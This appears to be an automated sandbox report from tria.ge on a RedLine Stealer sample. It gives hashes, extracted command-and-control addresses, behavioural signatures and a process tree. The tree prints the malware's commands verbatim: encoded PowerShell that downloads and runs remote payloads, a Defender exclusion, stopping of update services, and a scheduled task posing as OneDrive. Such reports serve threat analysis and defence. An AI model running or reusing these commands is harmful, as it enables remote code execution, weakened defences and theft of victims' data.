Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
46s -
max time network
112s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
12/05/2023, 15:26
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20230220-en
General
-
Target
file.exe
-
Size
76KB
-
MD5
1deaa9be17e8122d78a470f44a58300a
-
SHA1
984147abf4e9f173eb233e0949d76e45dd77ef8a
-
SHA256
712f4d08ad4db1fb658d8206cee6a00f4024fd4ef5de8de0dfbe0d98779f9f86
-
SHA512
9a522a03887c38b16d7a34a08f3e9f4aded39066fc852575659b4320f5bb7e51693e7d5ca1715a6d67118fa7340d97309e5bf5869e2aa2ab63b7f0fed4fa10de
-
SSDEEP
1536:zcr6SNQrsMB3xVyalA9XbLxEC58dHPonAXBbKaAE2UHu90+E:FSNsJ/Vyaald+dQnAXBbKaAE2UH/+E
Malware Config
Extracted
http://62.204.41.23/r.png
Extracted
http://62.204.41.23/file.png
Extracted
http://62.204.41.23/o.png
Extracted
redline
[ PRO ]
185.161.248.16:26885
-
auth_value
b4958da54d1cdd9d9b28330afda1cc3c
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 3004 created 2812 3004 OneDrive.exe 48 PID 3004 created 2812 3004 OneDrive.exe 48 -
Blocklisted process makes network request 3 IoCs
flow pid Process 9 3340 powershell.exe 10 4884 powershell.exe 11 996 powershell.exe -
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion OneDrive.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion OneDrive.exe -
Executes dropped EXE 1 IoCs
pid Process 3004 OneDrive.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 27 ipinfo.io -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 996 set thread context of 3640 996 powershell.exe 93 PID 4884 set thread context of 3792 4884 powershell.exe 95 -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3096 sc.exe 1104 sc.exe 4840 sc.exe 4816 sc.exe 4892 sc.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 RegSvcs.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegSvcs.exe -
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 3916 powershell.exe 4884 powershell.exe 3340 powershell.exe 996 powershell.exe 4884 powershell.exe 3916 powershell.exe 996 powershell.exe 3340 powershell.exe 4884 powershell.exe 4884 powershell.exe 3004 OneDrive.exe 3004 OneDrive.exe 3244 powershell.exe 3244 powershell.exe 3244 powershell.exe 3004 OneDrive.exe 3004 OneDrive.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 3916 powershell.exe Token: SeDebugPrivilege 4884 powershell.exe Token: SeDebugPrivilege 3340 powershell.exe Token: SeDebugPrivilege 996 powershell.exe Token: SeDebugPrivilege 3640 RegSvcs.exe Token: SeDebugPrivilege 3244 powershell.exe -
Suspicious use of WriteProcessMemory 29 IoCs
description pid Process procid_target PID 400 wrote to memory of 3916 400 file.exe 85 PID 400 wrote to memory of 3916 400 file.exe 85 PID 400 wrote to memory of 996 400 file.exe 88 PID 400 wrote to memory of 996 400 file.exe 88 PID 400 wrote to memory of 3340 400 file.exe 87 PID 400 wrote to memory of 3340 400 file.exe 87 PID 400 wrote to memory of 4884 400 file.exe 86 PID 400 wrote to memory of 4884 400 file.exe 86 PID 996 wrote to memory of 3640 996 powershell.exe 93 PID 996 wrote to memory of 3640 996 powershell.exe 93 PID 996 wrote to memory of 3640 996 powershell.exe 93 PID 996 wrote to memory of 3640 996 powershell.exe 93 PID 996 wrote to memory of 3640 996 powershell.exe 93 PID 996 wrote to memory of 3640 996 powershell.exe 93 PID 996 wrote to memory of 3640 996 powershell.exe 93 PID 996 wrote to memory of 3640 996 powershell.exe 93 PID 4884 wrote to memory of 4944 4884 powershell.exe 94 PID 4884 wrote to memory of 4944 4884 powershell.exe 94 PID 4884 wrote to memory of 4944 4884 powershell.exe 94 PID 4884 wrote to memory of 3792 4884 powershell.exe 95 PID 4884 wrote to memory of 3792 4884 powershell.exe 95 PID 4884 wrote to memory of 3792 4884 powershell.exe 95 PID 4884 wrote to memory of 3792 4884 powershell.exe 95 PID 4884 wrote to memory of 3792 4884 powershell.exe 95 PID 4884 wrote to memory of 3792 4884 powershell.exe 95 PID 4884 wrote to memory of 3792 4884 powershell.exe 95 PID 4884 wrote to memory of 3792 4884 powershell.exe 95 PID 3340 wrote to memory of 3004 3340 powershell.exe 102 PID 3340 wrote to memory of 3004 3340 powershell.exe 102
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:2812
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:400 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3916
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵PID:4944
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵PID:3792
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3340 -
C:\Users\Admin\AppData\Roaming\OneDrive.exe"C:\Users\Admin\AppData\Roaming\OneDrive.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks BIOS information in registry
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3004
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:996 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:3640
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3244
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:2056
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4816
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4892
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3096
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1104
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4840
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:3848
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:3076
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:1552
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:2340
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:1228
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:4824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#huakaggax#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }2⤵PID:3916
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD5321756505d3ef828b22186c6b927a5fa
SHA1d65a23744ec9ebb01baa142aa48a50c25e5e3a51
SHA256990c202a39be4cceab0adb117dee8b9179ba607851616d49b653ea0daabc8fcc
SHA51250fccf3a880c26aad38ebef396ab5550be96f0cd5ba602dbb7a017cd78c7fe3f21edb713638929b19f44e919f2879ab251825ad38682fd9a94053b944382bed2
-
Filesize
1KB
MD5c99bf984470b50d6d6d1bc428350c588
SHA1977b213e51f6295dabdcb1ebe9c86fd8e6fef87b
SHA256bb87529d81e5a91b8c6cbf2e0b8da19b7c0142fd6c0f541deadbe0551d280a31
SHA512e2ccc419eec7002cf53f543f4e83b71556465c456662a0669594b67a979383c37dda636df84e99abb1883d2795810d49a46ac1677e23e2ac9d5336edfb3ab09d
-
Filesize
1KB
MD5c99bf984470b50d6d6d1bc428350c588
SHA1977b213e51f6295dabdcb1ebe9c86fd8e6fef87b
SHA256bb87529d81e5a91b8c6cbf2e0b8da19b7c0142fd6c0f541deadbe0551d280a31
SHA512e2ccc419eec7002cf53f543f4e83b71556465c456662a0669594b67a979383c37dda636df84e99abb1883d2795810d49a46ac1677e23e2ac9d5336edfb3ab09d
-
Filesize
944B
MD581f4ac79c3a7bb71b993740edf8ad66f
SHA1f73107e3f99698c57df1f2e633bd553189870cd6
SHA2562be544978e3c9df7849a7677168a53d5e6b0842a475e954b7112f2d8fe7ffaad
SHA512aabaae28daeee334411f05b31c75a261c3cfad8c76dae96463342a246723e3fdf52b7d8a6c07e2d50dc74e6a1897b1d7f8d652e31e1d36cef6e0c5dad0af1d46
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
8.6MB
MD5546bd4f906d07e78c3167428c09ecb4f
SHA1f3ed2616a9630f83922e1b4a07bc8251e23530c4
SHA25606e2a779b34fbd168fb85d4ee1331967a87187fa810bd3739f96bb9222869ad4
SHA512066b3348b02a20d9dcffeadb322d3e9d726b59d1a93101adebc23edb008108782cf699846d7d874c17f45fdf60c17a021b21b77264022a0f2bc943b02575cd82
-
Filesize
8.6MB
MD5546bd4f906d07e78c3167428c09ecb4f
SHA1f3ed2616a9630f83922e1b4a07bc8251e23530c4
SHA25606e2a779b34fbd168fb85d4ee1331967a87187fa810bd3739f96bb9222869ad4
SHA512066b3348b02a20d9dcffeadb322d3e9d726b59d1a93101adebc23edb008108782cf699846d7d874c17f45fdf60c17a021b21b77264022a0f2bc943b02575cd82